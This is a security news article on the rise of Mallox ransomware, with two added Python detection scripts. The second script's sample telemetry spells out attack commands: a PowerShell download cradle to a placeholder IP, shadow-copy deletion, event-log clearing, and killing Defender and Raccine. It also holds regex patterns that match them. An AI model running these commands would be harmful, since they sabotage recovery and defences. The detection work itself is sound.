Mallox ransomware activity has jumped 174% in 2023 compared with the previous year, according to new findings from Palo Alto Networks Unit 42.
“Like its counterparts, Mallox ransomware adopts the dual extortion strategy: it steals data prior to encrypting an organization’s files, then threatens to expose the pilfered data on a leak site. This tactic applies pressure on victims, coercing them to pay the demanded ransom,” said security researchers Lior Rochberger and Shimi Cohen in a report shared with The Hacker News.
The threat actor behind Mallox is linked to other ransomware strains, including TargetCompany, Tohnichi, Fargo and, most recently, Xollam. Mallox first emerged in June 2021.
Industries notably targeted by Mallox include manufacturing, professional and legal services, and the wholesale and retail sectors.
A hallmark of the group is how it gets in: dictionary attacks against poorly secured MS-SQL servers, which it uses as its route into victims’ networks. Xollam is the exception; as Trend Micro reported last month, it relies on malicious OneNote file attachments for initial access instead.
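The dictionary attacks described above leave a very visible trail on the server itself: every failed SQL login is written to the SQL Server ERRORLOG (and to the Windows Application log as event 18456) with the client address attached. The script below is an added example, not code from Unit 42 or from the article, showing how to turn those lines into a detection by counting failures per source address inside a sliding window. The log lines, addresses (RFC 5737 documentation ranges) and the threshold are constructed for the example.

```python
"""Spot dictionary attacks on SQL Server from the ERRORLOG's 'Login failed' lines.

Added example, not from the Unit 42 report. The sample lines are constructed to
mirror the real ERRORLOG format (an 'Error: 18456' line followed by a
'Login failed for user' line ending in the client address); the IPs are
RFC 5737 documentation addresses.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# "<timestamp> Logon   Login failed for user '<login>'. Reason: ... [CLIENT: <ip>]"
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<ip>[^\]\s]+)\]"
)


def parse_failures(lines):
    """Yield (timestamp, login, client_ip) for each failed-login line; skip the rest."""
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["user"], m["ip"]


def detect_dictionary_attacks(lines, threshold=10, window=timedelta(minutes=1)):
    """Return {client_ip: {"failures": total, "logins": [...]}} for every source that
    produced at least `threshold` failed logins inside any sliding `window`.

    Distinct login names are kept as well: spraying many names from one address is
    as telling as hammering 'sa'.
    """
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    total = defaultdict(int)
    logins = defaultdict(set)
    flagged = {}
    for ts, user, ip in parse_failures(lines):
        total[ip] += 1
        logins[ip].add(user)
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = {"failures": total[ip], "logins": sorted(logins[ip])}
    return flagged


def _failed(ts, user, ip):
    """Build one constructed failed-login line in ERRORLOG format."""
    return (f"{ts} Logon       Login failed for user '{user}'. "
            f"Reason: Password did not match that for the login provided. [CLIENT: {ip}]")


# Constructed sample: 12 guesses against 'sa' in twelve seconds from one address,
# plus two typos by a legitimate admin that must not be flagged.
SAMPLE_ERRORLOG = [
    "2023-07-20 10:15:30.01 spid52      Starting up database 'msdb'.",
    "2023-07-20 10:15:31.12 Logon       Error: 18456, Severity: 14, State: 8.",
] + [
    _failed(f"2023-07-20 10:15:{31 + i:02d}.12", "sa", "203.0.113.45") for i in range(12)
] + [
    _failed("2023-07-20 10:16:02.40", "CORP\\jdoe", "198.51.100.7"),
    _failed("2023-07-20 10:16:05.11", "CORP\\jdoe", "198.51.100.7"),
]

if __name__ == "__main__":
    for ip, info in detect_dictionary_attacks(SAMPLE_ERRORLOG).items():
        print(f"{ip}: {info['failures']} failed logins against {info['logins']}")
```

On a live instance, feed the function the ERRORLOG from the instance's MSSQL\Log directory (SQL Server records failed logins by default; successful ones only if login auditing is raised). Detection is the fallback, though: a server that can be dictionary-attacked at all is one that exposes SQL authentication, usually with `sa` enabled, to a network it should not be reachable from.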
Once it has a foothold on a host, Mallox runs a PowerShell command to download the ransomware payload from a remote server. The binary then stops and deletes SQL-related services, erases volume shadow copies, clears system event logs, terminates security-related processes and bypasses Raccine, an open-source utility created to thwart ransomware attacks. Only then does it begin encrypting files, dropping a ransom note in every directory.
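Every step of that chain is a process launch with a recognisable command line, which makes it a good candidate for a correlation rule rather than a single-indicator alert. The script below is an added example, not code from Unit 42 or from the article, that walks a list of process-creation events (the Image, ParentImage and CommandLine fields Sysmon Event ID 1 or Security event 4688 provide) and maps each to a stage of the chain described above. The sample events, payload name, addresses (RFC 5737 ranges) and the list of security processes are constructed; the Raccine rule covers a generic way of disabling it and does not claim to be the technique Mallox uses.

```python
"""Flag the Mallox-style post-exploitation chain from process-creation telemetry.

Added example (not Unit 42's code). Events are dicts carrying the Image, ParentImage
and CommandLine fields of Sysmon Event ID 1 / Security 4688. Sample events, the
payload name, IPs (RFC 5737) and SECURITY_PROCESSES are constructed for the example.
"""
import re
from collections import OrderedDict

# Assumed list of defensive processes worth alerting on when killed; extend for your EDR.
SECURITY_PROCESSES = ["MsMpEng.exe", "Raccine.exe"]

# Each rule: (stage name, regex run against the full command line).
RULES = [
    ("download_cradle", re.compile(
        r"powershell.*?(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|"
        r"Start-BitsTransfer|-enc(odedcommand)?\b)", re.I)),
    ("sql_services_stopped", re.compile(
        r'\b(sc(\.exe)?\s+(stop|delete)|net(\.exe)?\s+stop)\s+"?'
        r'(MSSQL|SQLAgent|SQLBrowser|SQLWriter|ReportServer)', re.I)),
    ("shadow_copies_deleted", re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|"
        r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("event_logs_cleared", re.compile(
        r"wevtutil(\.exe)?\s+(cl|clear-log)\b|Clear-EventLog", re.I)),
    ("security_tools_killed", re.compile(
        r'taskkill(\.exe)?\b.*?/im\s+"?(' + "|".join(map(re.escape, SECURITY_PROCESSES)) + ")",
        re.I)),
    # Raccine registers itself as the IFEO "Debugger" for vssadmin/wmic/wbadmin/bcdedit;
    # deleting those keys is one generic way to neutralise it (the report does not say
    # how Mallox bypasses it, so this rule is an assumption).
    ("raccine_disabled", re.compile(
        r"reg(\.exe)?\s+delete\s+.*Image File Execution Options\\(vssadmin|wmic|wbadmin|bcdedit)\.exe",
        re.I)),
]
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(events):
    """Map each matched stage to the command lines that triggered it, in first-seen order."""
    matches = OrderedDict()
    for ev in events:
        cmd = ev.get("CommandLine", "")
        # xp_cmdshell runs commands through cmd.exe under sqlservr.exe: a shell child of
        # the SQL Server process is the on-host start of an MS-SQL intrusion.
        if basename(ev.get("ParentImage", "")) == "sqlservr.exe" and basename(ev.get("Image", "")) in SHELLS:
            matches.setdefault("sql_spawned_shell", []).append(cmd)
        for stage, pattern in RULES:
            if pattern.search(cmd):
                matches.setdefault(stage, []).append(cmd)
    return matches


def is_ransomware_chain(matches, min_stages=3):
    """Verdict: several distinct stages seen, and recovery was sabotaged (shadow copies gone)."""
    return len(matches) >= min_stages and "shadow_copies_deleted" in matches


PAYLOAD = r"C:\Users\Public\payload.exe"   # constructed path, not a Mallox indicator
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://198.51.100.23/payload.exe','" + PAYLOAD + "')\""},
    {"Image": r"C:\Windows\System32\sc.exe", "ParentImage": PAYLOAD, "CommandLine": "sc.exe stop MSSQLSERVER"},
    {"Image": r"C:\Windows\System32\sc.exe", "ParentImage": PAYLOAD, "CommandLine": "sc.exe delete MSSQLSERVER"},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": PAYLOAD,
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Image": r"C:\Windows\System32\wevtutil.exe", "ParentImage": PAYLOAD, "CommandLine": "wevtutil.exe cl Security"},
    {"Image": r"C:\Windows\System32\taskkill.exe", "ParentImage": PAYLOAD, "CommandLine": "taskkill.exe /F /IM MsMpEng.exe"},
    {"Image": r"C:\Windows\System32\reg.exe", "ParentImage": PAYLOAD,
     "CommandLine": 'reg.exe delete "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
                    '\\Image File Execution Options\\vssadmin.exe" /f'},
    # Benign administrative noise that must not fire.
    {"Image": r"C:\Windows\System32\sc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "sc.exe query Spooler"},
]

if __name__ == "__main__":
    seen = assess(SAMPLE_EVENTS)
    for stage, cmds in seen.items():
        print(f"{stage}: {cmds}")
    print("ransomware chain:", is_ransomware_chain(seen))
```

Two points follow from the chain itself. The event-log clearing step means the Security log on the victim cannot be trusted after the fact, so these events need to be forwarded off-host as they occur. And because the payload deliberately disables host-side blockers such as Raccine, alerting should come from telemetry the attacker cannot switch off from the same privilege level, not from the blocker's own logs.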
TargetCompany, though a small, closed group, has been observed recruiting affiliates for the Mallox ransomware-as-a-service (RaaS) program on the RAMP cybercrime forum.
Ransomware remains a lucrative business: cybercriminals extorted $449.1 million in the first half of 2023 alone, according to Chainalysis.
The surge in Mallox attacks reflects a wider trend: ransomware incidents were up 221% year-on-year as of June 2023, with 434 attacks reported in that month alone, largely driven by Cl0p’s exploitation of a vulnerability in the MOVEit file transfer software.
“The Mallox ransomware group has ramped up their activities in recent months, and their current recruitment drive may potentially expand their range of targets if it proves successful,” stated the researchers.